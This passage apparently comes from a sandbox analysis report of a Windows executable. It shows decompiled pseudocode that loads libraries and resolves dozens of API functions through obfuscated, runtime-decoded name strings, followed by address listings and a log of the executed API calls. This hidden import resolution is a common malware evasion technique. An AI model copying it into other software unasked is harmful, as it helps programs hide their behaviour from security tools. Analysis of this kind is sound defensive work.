				struct HINSTANCE__* _v8;
				struct HINSTANCE__* _v12;
				struct HINSTANCE__* _v16;
				struct HINSTANCE__* _v20;
				struct HINSTANCE__* _v24;
				struct HINSTANCE__* _v28;
				struct HINSTANCE__* _v32;
				struct HINSTANCE__* _v36;
				struct HINSTANCE__* _v40;
				struct HINSTANCE__* _v44;
				struct HINSTANCE__* _v48;
				struct HINSTANCE__* _v52;
				CHAR* _t135;
				struct HINSTANCE__* _t136;
				struct HINSTANCE__* _t137;
				struct HINSTANCE__* _t138;
				CHAR* _t139;
				struct HINSTANCE__* _t140;
				struct HINSTANCE__* _t141;
				struct HINSTANCE__* _t142;
				CHAR* _t143;
				struct HINSTANCE__* _t144;
				struct HINSTANCE__* _t145;
				struct HINSTANCE__* _t146;
				CHAR* _t147;
				_Unknown_base(*)()* _t149;
				CHAR* _t150;
				CHAR* _t155;
				CHAR* _t160;
				_Unknown_base(*)()* _t161;
				CHAR* _t165;
				CHAR* _t170;
				CHAR* _t175;
				CHAR* _t180;
				CHAR* _t185;
				CHAR* _t188;
				CHAR* _t193;
				CHAR* _t198;
				CHAR* _t201;
				CHAR* _t204;
				CHAR* _t210;
				CHAR* _t215;
				CHAR* _t220;
				CHAR* _t227;
				CHAR* _t232;
				intOrPtr _t233;
				CHAR* _t238;
				CHAR* _t243;
				CHAR* _t248;
				CHAR* _t253;
				CHAR* _t258;
				CHAR* _t263;
				CHAR* _t268;
				CHAR* _t273;
				CHAR* _t278;
				CHAR* _t283;
				CHAR* _t288;
				CHAR* _t293;
				CHAR* _t298;
				CHAR* _t303;
				CHAR* _t308;
				CHAR* _t313;
				CHAR* _t318;
				CHAR* _t322;
				CHAR* _t323;
				CHAR* _t324;
				CHAR* _t325;
				CHAR* _t327;
				CHAR* _t329;
				CHAR* _t331;
				CHAR* _t333;
				CHAR* _t335;
				CHAR* _t336;
				CHAR* _t338;
				CHAR* _t340;
				CHAR* _t342;
				CHAR* _t344;
				CHAR* _t347;
				CHAR* _t350;
				CHAR* _t352;
				CHAR* _t354;
				CHAR* _t356;
				CHAR* _t358;
				CHAR* _t359;
				CHAR* _t361;
				CHAR* _t364;
				CHAR* _t366;
				CHAR* _t368;
				CHAR* _t370;
				CHAR* _t372;
				CHAR* _t374;
				CHAR* _t376;
				CHAR* _t378;
				CHAR* _t380;
				CHAR* _t382;
				CHAR* _t384;
				CHAR* _t386;
				CHAR* _t388;
				CHAR* _t390;
				CHAR* _t392;
				CHAR* _t394;
				CHAR* _t396;
				CHAR* _t398;
				CHAR* _t399;
				CHAR* _t400;
				CHAR* _t401;
				CHAR* _t403;
				CHAR* _t405;
				CHAR* _t407;
				CHAR* _t409;
				CHAR* _t412;
				CHAR* _t414;
				CHAR* _t416;
				CHAR* _t418;
				CHAR* _t420;
				CHAR* _t422;
				CHAR* _t423;
				CHAR* _t425;
				CHAR* _t426;
				CHAR* _t428;
				CHAR* _t430;
				CHAR* _t432;
				CHAR* _t434;
				CHAR* _t436;
				intOrPtr _t438;
				CHAR* _t440;
				CHAR* _t442;
				CHAR* _t444;
				CHAR* _t446;
				CHAR* _t448;
				CHAR* _t450;
				CHAR* _t452;
				CHAR* _t454;
				CHAR* _t456;
				CHAR* _t458;
				CHAR* _t460;
				CHAR* _t462;
				CHAR* _t464;
				CHAR* _t466;
				CHAR* _t468;
				CHAR* _t470;

				_v44 = E004196D0(__ecx);
				if(_v44 != 0) {
					_t233 =  *0x432204; // 0x23384b8
					 *0x432898 = E004195A0(_v44, _t233);
					_t438 =  *0x432438; // 0x2338440
					 *0x43280c = E004195A0(_v44, _t438);
					_t364 =  *0x4326e8; // 0x2338488
					 *0x432814 = GetProcAddress(_v44, _t364);
					_t238 =  *0x432540; // 0x23377b0
					 *0x4328d4 = GetProcAddress(_v44, _t238);
					_t440 =  *0x4324b4; // 0x2338518
					 *0x4328bc = GetProcAddress(_v44, _t440);
					_t366 =  *0x4320e0; // 0x23383b0
					 *0x432908 = GetProcAddress(_v44, _t366);
					_t243 =  *0x432554; // 0x23383c8
					 *0x432888 = GetProcAddress(_v44, _t243);
					_t442 =  *0x432274; // 0x2338590
					 *0x43278c = GetProcAddress(_v44, _t442);
					_t368 =  *0x4325cc; // 0x2338470
					 *0x4327c0 = GetProcAddress(_v44, _t368);
					_t248 =  *0x4320dc; // 0x23375b0
					 *0x432910 = GetProcAddress(_v44, _t248);
					_t444 =  *0x4326c8; // 0x23378b0
					 *0x432878 = GetProcAddress(_v44, _t444);
					_t370 =  *0x43213c; // 0x2338380
					 *0x4328c0 = GetProcAddress(_v44, _t370);
					_t253 =  *0x432230; // 0x2337730
					 *0x4328e8 = GetProcAddress(_v44, _t253);
					_t446 =  *0x432218; // 0x2338530
					 *0x432840 = GetProcAddress(_v44, _t446);
					_t372 =  *0x4326c0; // 0x2337690
					 *0x4328f4 = GetProcAddress(_v44, _t372);
					_t258 =  *0x4322fc; // 0x2337910
					 *0x432774 = GetProcAddress(_v44, _t258);
					_t448 =  *0x432580; // 0x23363e0
					 *0x4327d0 = GetProcAddress(_v44, _t448);
					_t374 =  *0x4323dc; // 0x2337930
					 *0x432848 = GetProcAddress(_v44, _t374);
					_t263 =  *0x43245c; // 0x23383f8
					 *0x432894 = GetProcAddress(_v44, _t263);
					_t450 =  *0x432270; // 0x2338638
					 *0x432798 = GetProcAddress(_v44, _t450);
					_t376 =  *0x4321e8; // 0x2337830
					 *0x432824 = GetProcAddress(_v44, _t376);
					_t268 =  *0x4323d4; // 0x23377d0
					 *0x43285c = GetProcAddress(_v44, _t268);
					_t452 =  *0x43238c; // 0x23377f0
					 *0x432780 = GetProcAddress(_v44, _t452);
					_t378 =  *0x4324e4; // 0x2337630
					 *0x4328d0 = GetProcAddress(_v44, _t378);
					_t273 =  *0x432500; // 0x23375f0
					 *0x4327f8 = GetProcAddress(_v44, _t273);
					_t454 =  *0x432340; // 0x23384d0
					 *0x432914 = GetProcAddress(_v44, _t454);
					_t380 =  *0x432628; // 0x2337850
					 *0x432884 = GetProcAddress(_v44, _t380);
					_t278 =  *0x43257c; // 0x2336570
					 *0x432770 = GetProcAddress(_v44, _t278);
					_t456 =  *0x43237c; // 0x23383e0
					 *0x43286c = GetProcAddress(_v44, _t456);
					_t382 =  *0x43249c; // 0x2338500
					 *0x4327a4 = GetProcAddress(_v44, _t382);
					_t283 =  *0x432314; // 0x2338458
					 *0x43288c = GetProcAddress(_v44, _t283);
					_t458 =  *0x432648; // 0x2338608
					 *0x4328dc = GetProcAddress(_v44, _t458);
					_t384 =  *0x4325d8; // 0x2338548
					 *0x432820 = GetProcAddress(_v44, _t384);
					_t288 =  *0x43255c; // 0x23384e8
					 *0x4327d8 = GetProcAddress(_v44, _t288);
					_t460 =  *0x4324e0; // 0x2338368
					 *0x43276c = GetProcAddress(_v44, _t460);
					_t386 =  *0x43267c; // 0x2338620
					 *0x4328c4 = GetProcAddress(_v44, _t386);
					_t293 =  *0x43217c; // 0x2338560
					 *0x432854 = GetProcAddress(_v44, _t293);
					_t462 =  *0x4322b0; // 0x23385a8
					 *0x4328d8 = GetProcAddress(_v44, _t462);
					_t388 =  *0x4325c4; // 0x2338350
					 *0x4328e4 = GetProcAddress(_v44, _t388);
					_t298 =  *0x4326d0; // 0x2338410
					 *0x432864 = GetProcAddress(_v44, _t298);
					_t464 =  *0x4321fc; // 0x2338428
					 *0x4327c4 = GetProcAddress(_v44, _t464);
					_t390 =  *0x4325a4; // 0x2337870
					 *0x432790 = GetProcAddress(_v44, _t390);
					_t303 =  *0x4323f4; // 0x2338578
					 *0x4328a4 = GetProcAddress(_v44, _t303);
					_t466 =  *0x4323ec; // 0x23386e0
					 *0x432860 = GetProcAddress(_v44, _t466);
					_t392 =  *0x4322c8; // 0x2337890
					 *0x432850 = GetProcAddress(_v44, _t392);
					_t308 =  *0x43266c; // 0x2338680
					 *0x4328e0 = GetProcAddress(_v44, _t308);
					_t468 =  *0x4320ac; // 0x23378f0
					 *0x4328f8 = GetProcAddress(_v44, _t468);
					_t394 =  *0x43218c; // 0x2337610
					 *0x432794 = GetProcAddress(_v44, _t394);
					_t313 =  *0x4321b8; // 0x2336598
					 *0x432844 = GetProcAddress(_v44, _t313);
					_t470 =  *0x432330; // 0x2338710
					 *0x4328c8 = GetProcAddress(_v44, _t470);
					_t396 =  *0x432124; // 0x23386f8
					 *0x432904 = GetProcAddress(_v44, _t396);
					_t318 =  *0x432428; // 0x2338698
					 *0x4327bc = GetProcAddress(_v44, _t318);
					 *0x4328f0 = GetProcAddress(_v44, "HeapFree");
				}
				_t135 =  *0x432318; // 0x23380d0
				_t136 = LoadLibraryA(_t135); // executed
				_v40 = _t136;
				_t322 =  *0x4322dc; // 0x2338118
				_t137 = LoadLibraryA(_t322); // executed
				_v36 = _t137;
				_t398 =  *0x4321d8; // 0x2338130
				_t138 = LoadLibraryA(_t398); // executed
				_v32 = _t138;
				_t139 =  *0x432234; // 0x23380a0
				_t140 = LoadLibraryA(_t139); // executed
				_v48 = _t140;
				_t323 =  *0x432560; // 0x2338088
				_t141 = LoadLibraryA(_t323); // executed
				_v12 = _t141;
				_t399 =  *0x43262c; // 0x23380e8
				_t142 = LoadLibraryA(_t399); // executed
				_v20 = _t142;
				_t143 =  *0x4325dc; // 0x23385f0
				_t144 = LoadLibraryA(_t143); // executed
				_v28 = _t144;
				_t324 =  *0x43221c; // 0x2338398
				_t145 = LoadLibraryA(_t324); // executed
				_v24 = _t145;
				_t400 =  *0x432364; // 0x23385c0
				_t146 = LoadLibraryA(_t400); // executed
				_v8 = _t146;
				_t147 =  *0x432160; // 0x23384a0
				_v16 = LoadLibraryA(_t147);
				_t325 =  *0x432108; // 0x23385d8
				_t149 = LoadLibraryA(_t325);
				_v52 = _t149;
				if(_v40 != 0) {
					_t434 =  *0x432150; // 0x2336610
					 *0x432804 = GetProcAddress(_v40, _t434);
					_t359 =  *0x432668; // 0x23376b0
					 *0x4328a0 = GetProcAddress(_v40, _t359);
					_t227 =  *0x4324a4; // 0x23365e8
					 *0x4327c8 = GetProcAddress(_v40, _t227);
					_t436 =  *0x43233c; // 0x2337670
					 *0x4327b4 = GetProcAddress(_v40, _t436);
					_t361 =  *0x4324b0; // 0x2336548
					 *0x4327a0 = GetProcAddress(_v40, _t361);
					_t232 =  *0x432110; // 0x2338650
					_t149 = GetProcAddress(_v40, _t232);
					 *0x4328cc = _t149;
				}
				if(_v36 != 0) {
					_t426 =  *0x432424; // 0x23376d0
					 *0x432838 = GetProcAddress(_v36, _t426);
					_t352 =  *0x4324fc; // 0x23376f0
					 *0x432810 = GetProcAddress(_v36, _t352);
					_t210 =  *0x4326b4; // 0x2337550
					 *0x432828 = GetProcAddress(_v36, _t210);
					_t428 =  *0x432454; // 0x23386b0
					 *0x4327d4 = GetProcAddress(_v36, _t428);
					_t354 =  *0x43226c; // 0x2337570
					 *0x432900 = GetProcAddress(_v36, _t354);
					_t215 =  *0x4324c0; // 0x2337590
					 *0x43283c = GetProcAddress(_v36, _t215);
					_t430 =  *0x4323ac; // 0x23386c8
					 *0x4327e4 = GetProcAddress(_v36, _t430);
					_t356 =  *0x43225c; // 0x2337bd0
					 *0x432800 = GetProcAddress(_v36, _t356);
					_t220 =  *0x4324f0; // 0x2337ab0
					 *0x432830 = GetProcAddress(_v36, _t220);
					_t432 =  *0x43265c; // 0x2337ad0
					 *0x432834 = GetProcAddress(_v36, _t432);
					_t358 =  *0x432280; // 0x2337a50
					_t149 = GetProcAddress(_v36, _t358);
					 *0x43289c = _t149;
				}
				if(_v32 != 0) {
					_t204 =  *0x43232c; // 0x2337990
					 *0x4327e0 = GetProcAddress(_v32, _t204);
					_t425 =  *0x432114; // 0x2337b90
					_t149 = GetProcAddress(_v32, _t425);
					 *0x4327cc = _t149;
				}
				if(_v48 != 0) {
					_t350 =  *0x432378; // 0x2337a70
					_t149 = GetProcAddress(_v48, _t350);
					 *0x4327f0 = _t149;
				}
				if(_v20 != 0) {
					_t201 =  *0x432470; // 0x23379f0
					 *0x4327a8 = GetProcAddress(_v20, _t201);
					_t423 =  *0x432308; // 0x2338668
					_t149 = GetProcAddress(_v20, _t423);
					 *0x4328ac = _t149;
				}
				if(_v24 != 0) {
					_t347 =  *0x43227c; // 0x23379d0
					 *0x432868 = GetProcAddress(_v24, _t347);
					_t198 =  *0x4326b0; // 0x2338800
					 *0x4327f4 = GetProcAddress(_v24, _t198);
					_t422 =  *0x43210c; // 0x2337c10
					_t149 = GetProcAddress(_v24, _t422);
					 *0x432870 = _t149;
				}
				if(_v28 != 0) {
					_t342 =  *0x43261c; // 0x2338818
					 *0x4327ac = GetProcAddress(_v28, _t342);
					_t188 =  *0x4324c8; // 0x2337970
					 *0x432918 = GetProcAddress(_v28, _t188);
					_t418 =  *0x4321b4; // 0x23388f0
					 *0x432858 = GetProcAddress(_v28, _t418);
					_t344 =  *0x432528; // 0x2338830
					 *0x43282c = GetProcAddress(_v28, _t344);
					_t193 =  *0x432674; // 0x2337a10
					 *0x43290c = GetProcAddress(_v28, _t193);
					_t420 =  *0x43222c; // 0x2338a10
					 *0x4327e8 = GetProcAddress(_v28, _t420);
					_t149 = GetProcAddress(_v28, "RegEnumValueA");
					 *0x432874 = _t149;
				}
				if(_v12 != 0) {
					_t416 =  *0x43212c; // 0x2338980
					_t149 = GetProcAddress(_v12, _t416);
					 *0x432818 = _t149;
				}
				if(_v8 != 0) {
					_t336 =  *0x4323a4; // 0x2336390
					 *0x4327b0 = GetProcAddress(_v8, _t336);
					_t175 =  *0x4322a4; // 0x2337c30
					 *0x4327ec = GetProcAddress(_v8, _t175);
					_t412 =  *0x4322f8; // 0x2336408
					 *0x432880 = GetProcAddress(_v8, _t412);
					_t338 =  *0x432214; // 0x2337bb0
					 *0x432788 = GetProcAddress(_v8, _t338);
					_t180 =  *0x43219c; // 0x2338908
					 *0x4328b0 = GetProcAddress(_v8, _t180);
					_t414 =  *0x432490; // 0x23388c0
					 *0x432890 = GetProcAddress(_v8, _t414);
					_t340 =  *0x4326dc; // 0x23379b0
					 *0x43284c = GetProcAddress(_v8, _t340);
					_t185 =  *0x432360; // 0x2337a30
					_t149 = GetProcAddress(_v8, _t185);
					 *0x4327b8 = _t149;
				}
				if(_v16 != 0) {
					_t405 =  *0x432468; // 0x2338758
					 *0x43281c = GetProcAddress(_v16, _t405);
					_t331 =  *0x4321c8; // 0x23389c8
					 *0x432808 = GetProcAddress(_v16, _t331);
					_t165 =  *0x432278; // 0x2337cb0
					 *0x43279c = GetProcAddress(_v16, _t165);
					_t407 =  *0x4326bc; // 0x2337c90
					 *0x4327fc = GetProcAddress(_v16, _t407);
					_t333 =  *0x4322c0; // 0x2337238
					 *0x43277c = GetProcAddress(_v16, _t333);
					_t170 =  *0x4325a0; // 0x2338770
					 *0x432784 = GetProcAddress(_v16, _t170);
					_t409 =  *0x432264; // 0x2338848
					 *0x4327dc = GetProcAddress(_v16, _t409);
					_t335 =  *0x432578; // 0x2338938
					_t149 = GetProcAddress(_v16, _t335);
					 *0x4328b8 = _t149;
				}
				if(_v52 != 0) {
					_t150 =  *0x4324ac; // 0x2337bf0
					 *0x4328b4 = GetProcAddress(_v52, _t150);
					_t401 =  *0x432304; // 0x2338788
					 *0x432768 = GetProcAddress(_v52, _t401);
					_t327 =  *0x4323cc; // 0x23387a0
					 *0x4328a8 = GetProcAddress(_v52, _t327);
					_t155 =  *0x43229c; // 0x2337af0
					 *0x4328fc = GetProcAddress(_v52, _t155);
					_t403 =  *0x4325c0; // 0x2337258
					 *0x4328ec = GetProcAddress(_v52, _t403);
					_t329 =  *0x432590; // 0x2337c50
					 *0x432778 = GetProcAddress(_v52, _t329);
					_t160 =  *0x432584; // 0x2337a90
					_t161 = GetProcAddress(_v52, _t160);
					 *0x43287c = _t161;
					return _t161;
				}
				return _t149;
			}
















































































































































                                                                                                                              0x0041970b
                                                                                                                              0x00419712
                                                                                                                              0x00419718
                                                                                                                              0x0041972a
                                                                                                                              0x0041972f
                                                                                                                              0x00419742
                                                                                                                              0x00419747
                                                                                                                              0x00419758
                                                                                                                              0x0041975d
                                                                                                                              0x0041976d
                                                                                                                              0x00419772
                                                                                                                              0x00419783
                                                                                                                              0x00419788
                                                                                                                              0x00419799
                                                                                                                              0x0041979e
                                                                                                                              0x004197ae
                                                                                                                              0x004197b3
                                                                                                                              0x004197c4
                                                                                                                              0x004197c9
                                                                                                                              0x004197da
                                                                                                                              0x004197df
                                                                                                                              0x004197ef
                                                                                                                              0x004197f4
                                                                                                                              0x00419805
                                                                                                                              0x0041980a
                                                                                                                              0x0041981b
                                                                                                                              0x00419820
                                                                                                                              0x00419830
                                                                                                                              0x00419835
                                                                                                                              0x00419846
                                                                                                                              0x0041984b
                                                                                                                              0x0041985c
                                                                                                                              0x00419861
                                                                                                                              0x00419871
                                                                                                                              0x00419876
                                                                                                                              0x00419887
                                                                                                                              0x0041988c
                                                                                                                              0x0041989d
                                                                                                                              0x004198a2
                                                                                                                              0x004198b2
                                                                                                                              0x004198b7
                                                                                                                              0x004198c8
                                                                                                                              0x004198cd
                                                                                                                              0x004198de
                                                                                                                              0x004198e3
                                                                                                                              0x004198f3
                                                                                                                              0x004198f8
                                                                                                                              0x00419909
                                                                                                                              0x0041990e
                                                                                                                              0x0041991f
                                                                                                                              0x00419924
                                                                                                                              0x00419934
                                                                                                                              0x00419939
                                                                                                                              0x0041994a
                                                                                                                              0x0041994f
                                                                                                                              0x00419960
                                                                                                                              0x00419965
                                                                                                                              0x00419975
                                                                                                                              0x0041997a
                                                                                                                              0x0041998b
                                                                                                                              0x00419990
                                                                                                                              0x004199a1
                                                                                                                              0x004199a6
                                                                                                                              0x004199b6
                                                                                                                              0x004199bb
                                                                                                                              0x004199cc
                                                                                                                              0x004199d1
                                                                                                                              0x004199e2
                                                                                                                              0x004199e7
                                                                                                                              0x004199f7
                                                                                                                              0x004199fc
                                                                                                                              0x00419a0d
                                                                                                                              0x00419a12
                                                                                                                              0x00419a23
                                                                                                                              0x00419a28
                                                                                                                              0x00419a38
                                                                                                                              0x00419a3d
                                                                                                                              0x00419a4e
                                                                                                                              0x00419a53
                                                                                                                              0x00419a64
                                                                                                                              0x00419a69
                                                                                                                              0x00419a79
                                                                                                                              0x00419a7e
                                                                                                                              0x00419a8f
                                                                                                                              0x00419a94
                                                                                                                              0x00419aa5
                                                                                                                              0x00419aaa
                                                                                                                              0x00419aba
                                                                                                                              0x00419abf
                                                                                                                              0x00419ad0
                                                                                                                              0x00419ad5
                                                                                                                              0x00419ae6
                                                                                                                              0x00419aeb
                                                                                                                              0x00419afb
                                                                                                                              0x00419b00
                                                                                                                              0x00419b11
                                                                                                                              0x00419b16
                                                                                                                              0x00419b27
                                                                                                                              0x00419b2c
                                                                                                                              0x00419b3c
                                                                                                                              0x00419b41
                                                                                                                              0x00419b52
                                                                                                                              0x00419b57
                                                                                                                              0x00419b68
                                                                                                                              0x00419b6d
                                                                                                                              0x00419b7d
                                                                                                                              0x00419b91
                                                                                                                              0x00419b91
                                                                                                                              0x00419b96
                                                                                                                              0x00419b9c
                                                                                                                              0x00419ba2
                                                                                                                              0x00419ba5
                                                                                                                              0x00419bac
                                                                                                                              0x00419bb2
                                                                                                                              0x00419bb5
                                                                                                                              0x00419bbc
                                                                                                                              0x00419bc2
                                                                                                                              0x00419bc5
                                                                                                                              0x00419bcb
                                                                                                                              0x00419bd1
                                                                                                                              0x00419bd4
                                                                                                                              0x00419bdb
                                                                                                                              0x00419be1
                                                                                                                              0x00419be4
                                                                                                                              0x00419beb
                                                                                                                              0x00419bf1
                                                                                                                              0x00419bf4
                                                                                                                              0x00419bfa
                                                                                                                              0x00419c00
                                                                                                                              0x00419c03
                                                                                                                              0x00419c0a
                                                                                                                              0x00419c10
                                                                                                                              0x00419c13
                                                                                                                              0x00419c1a
                                                                                                                              0x00419c20
                                                                                                                              0x00419c23
                                                                                                                              0x00419c2f
                                                                                                                              0x00419c32
                                                                                                                              0x00419c39
                                                                                                                              0x00419c3f
                                                                                                                              0x00419c46
                                                                                                                              0x00419c4c
                                                                                                                              0x00419c5d
                                                                                                                              0x00419c62
                                                                                                                              0x00419c73
                                                                                                                              0x00419c78
                                                                                                                              0x00419c88
                                                                                                                              0x00419c8d
                                                                                                                              0x00419c9e
                                                                                                                              0x00419ca3
                                                                                                                              0x00419cb4
                                                                                                                              0x00419cb9
                                                                                                                              0x00419cc3
                                                                                                                              0x00419cc9
                                                                                                                              0x00419cc9
                                                                                                                              0x00419cd2
                                                                                                                              0x00419cd8
                                                                                                                              0x00419ce9
                                                                                                                              0x00419cee
                                                                                                                              0x00419cff
                                                                                                                              0x00419d04
                                                                                                                              0x00419d14
                                                                                                                              0x00419d19
                                                                                                                              0x00419d2a
                                                                                                                              0x00419d2f
                                                                                                                              0x00419d40
                                                                                                                              0x00419d45
                                                                                                                              0x00419d55
                                                                                                                              0x00419d5a
                                                                                                                              0x00419d6b
                                                                                                                              0x00419d70
                                                                                                                              0x00419d81
                                                                                                                              0x00419d86
                                                                                                                              0x00419d96
                                                                                                                              0x00419d9b
                                                                                                                              0x00419dac
                                                                                                                              0x00419db1
                                                                                                                              0x00419dbc
                                                                                                                              0x00419dc2
                                                                                                                              0x00419dc2
                                                                                                                              0x00419dcb
                                                                                                                              0x00419dcd
                                                                                                                              0x00419ddd
                                                                                                                              0x00419de2
                                                                                                                              0x00419ded
                                                                                                                              0x00419df3
                                                                                                                              0x00419df3
                                                                                                                              0x00419dfc
                                                                                                                              0x00419dfe
                                                                                                                              0x00419e09
                                                                                                                              0x00419e0f
                                                                                                                              0x00419e0f
                                                                                                                              0x00419e18
                                                                                                                              0x00419e1a
                                                                                                                              0x00419e2a
                                                                                                                              0x00419e2f
                                                                                                                              0x00419e3a
                                                                                                                              0x00419e40
                                                                                                                              0x00419e40
                                                                                                                              0x00419e49
                                                                                                                              0x00419e4b
                                                                                                                              0x00419e5c
                                                                                                                              0x00419e61
                                                                                                                              0x00419e71
                                                                                                                              0x00419e76
                                                                                                                              0x00419e81
                                                                                                                              0x00419e87
                                                                                                                              0x00419e87
                                                                                                                              0x00419e90
                                                                                                                              0x00419e96
                                                                                                                              0x00419ea7
                                                                                                                              0x00419eac
                                                                                                                              0x00419ebc
                                                                                                                              0x00419ec1
                                                                                                                              0x00419ed2
                                                                                                                              0x00419ed7
                                                                                                                              0x00419ee8
                                                                                                                              0x00419eed
                                                                                                                              0x00419efd
                                                                                                                              0x00419f02
                                                                                                                              0x00419f13
                                                                                                                              0x00419f21
                                                                                                                              0x00419f27
                                                                                                                              0x00419f27
                                                                                                                              0x00419f30
                                                                                                                              0x00419f32
                                                                                                                              0x00419f3d
                                                                                                                              0x00419f43
                                                                                                                              0x00419f43
                                                                                                                              0x00419f4c
                                                                                                                              0x00419f52
                                                                                                                              0x00419f63
                                                                                                                              0x00419f68
                                                                                                                              0x00419f78
                                                                                                                              0x00419f7d
                                                                                                                              0x00419f8e
                                                                                                                              0x00419f93
                                                                                                                              0x00419fa4
                                                                                                                              0x00419fa9
                                                                                                                              0x00419fb9
                                                                                                                              0x00419fbe
                                                                                                                              0x00419fcf
                                                                                                                              0x00419fd4
                                                                                                                              0x00419fe5
                                                                                                                              0x00419fea
                                                                                                                              0x00419ff4
                                                                                                                              0x00419ffa
                                                                                                                              0x00419ffa
                                                                                                                              0x0041a003
                                                                                                                              0x0041a009
                                                                                                                              0x0041a01a
                                                                                                                              0x0041a01f
                                                                                                                              0x0041a030
                                                                                                                              0x0041a035
                                                                                                                              0x0041a045
                                                                                                                              0x0041a04a
                                                                                                                              0x0041a05b
                                                                                                                              0x0041a060
                                                                                                                              0x0041a071
                                                                                                                              0x0041a076
                                                                                                                              0x0041a086
                                                                                                                              0x0041a08b
                                                                                                                              0x0041a09c
                                                                                                                              0x0041a0a1
                                                                                                                              0x0041a0ac
                                                                                                                              0x0041a0b2
                                                                                                                              0x0041a0b2
                                                                                                                              0x0041a0bb
                                                                                                                              0x0041a0c1
                                                                                                                              0x0041a0d1
                                                                                                                              0x0041a0d6
                                                                                                                              0x0041a0e7
                                                                                                                              0x0041a0ec
                                                                                                                              0x0041a0fd
                                                                                                                              0x0041a102
                                                                                                                              0x0041a112
                                                                                                                              0x0041a117
                                                                                                                              0x0041a128
                                                                                                                              0x0041a12d
                                                                                                                              0x0041a13e
                                                                                                                              0x0041a143
                                                                                                                              0x0041a14d
                                                                                                                              0x0041a153
                                                                                                                              0x00000000
                                                                                                                              0x0041a153
                                                                                                                              0x0041a15b

                                                                                                                              APIs
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02338488), ref: 00419752
                                                                                                                              • GetProcAddress.KERNEL32(00000000,023377B0), ref: 00419767
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02338518), ref: 0041977D
                                                                                                                              • GetProcAddress.KERNEL32(00000000,023383B0), ref: 00419793
                                                                                                                              • GetProcAddress.KERNEL32(00000000,023383C8), ref: 004197A8
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02338590), ref: 004197BE
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02338470), ref: 004197D4
                                                                                                                              • GetProcAddress.KERNEL32(00000000,023375B0), ref: 004197E9
                                                                                                                              • GetProcAddress.KERNEL32(00000000,023378B0), ref: 004197FF
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02338380), ref: 00419815
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02337730), ref: 0041982A
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02338530), ref: 00419840
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02337690), ref: 00419856
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02337910), ref: 0041986B
                                                                                                                              • GetProcAddress.KERNEL32(00000000,023363E0), ref: 00419881
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02337930), ref: 00419897
                                                                                                                              • GetProcAddress.KERNEL32(00000000,023383F8), ref: 004198AC
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02338638), ref: 004198C2
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02337830), ref: 004198D8
                                                                                                                              • GetProcAddress.KERNEL32(00000000,023377D0), ref: 004198ED
                                                                                                                              • GetProcAddress.KERNEL32(00000000,023377F0), ref: 00419903
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02337630), ref: 00419919
                                                                                                                              • GetProcAddress.KERNEL32(00000000,023375F0), ref: 0041992E
                                                                                                                              • GetProcAddress.KERNEL32(00000000,023384D0), ref: 00419944
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02337850), ref: 0041995A
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02336570), ref: 0041996F
                                                                                                                              • GetProcAddress.KERNEL32(00000000,023383E0), ref: 00419985
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02338500), ref: 0041999B
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02338458), ref: 004199B0
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02338608), ref: 004199C6
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02338548), ref: 004199DC
                                                                                                                              • GetProcAddress.KERNEL32(00000000,023384E8), ref: 004199F1
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02338368), ref: 00419A07
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02338620), ref: 00419A1D
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02338560), ref: 00419A32
                                                                                                                              • GetProcAddress.KERNEL32(00000000,023385A8), ref: 00419A48
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02338350), ref: 00419A5E
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02338410), ref: 00419A73
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02338428), ref: 00419A89
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02337870), ref: 00419A9F
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02338578), ref: 00419AB4
                                                                                                                              • GetProcAddress.KERNEL32(00000000,023386E0), ref: 00419ACA
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02337890), ref: 00419AE0
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02338680), ref: 00419AF5
                                                                                                                              • GetProcAddress.KERNEL32(00000000,023378F0), ref: 00419B0B
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02337610), ref: 00419B21
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02336598), ref: 00419B36
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02338710), ref: 00419B4C
                                                                                                                              • GetProcAddress.KERNEL32(00000000,023386F8), ref: 00419B62
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02338698), ref: 00419B77
                                                                                                                              • GetProcAddress.KERNEL32(00000000,HeapFree), ref: 00419B8B
                                                                                                                              • LoadLibraryA.KERNEL32(023380D0), ref: 00419B9C
                                                                                                                              • LoadLibraryA.KERNEL32(02338118), ref: 00419BAC
                                                                                                                              • LoadLibraryA.KERNEL32(02338130), ref: 00419BBC
                                                                                                                              • LoadLibraryA.KERNEL32(023380A0), ref: 00419BCB
                                                                                                                              • LoadLibraryA.KERNEL32(02338088), ref: 00419BDB
                                                                                                                              • LoadLibraryA.KERNEL32(023380E8), ref: 00419BEB
                                                                                                                              • LoadLibraryA.KERNEL32(023385F0), ref: 00419BFA
                                                                                                                              • LoadLibraryA.KERNEL32(02338398), ref: 00419C0A
                                                                                                                              • LoadLibraryA.KERNEL32(023385C0), ref: 00419C1A
                                                                                                                              • LoadLibraryA.KERNEL32(023384A0), ref: 00419C29
                                                                                                                              • LoadLibraryA.KERNEL32(023385D8), ref: 00419C39
                                                                                                                              • GetProcAddress.KERNEL32(00000000,02336610), ref: 00419C57
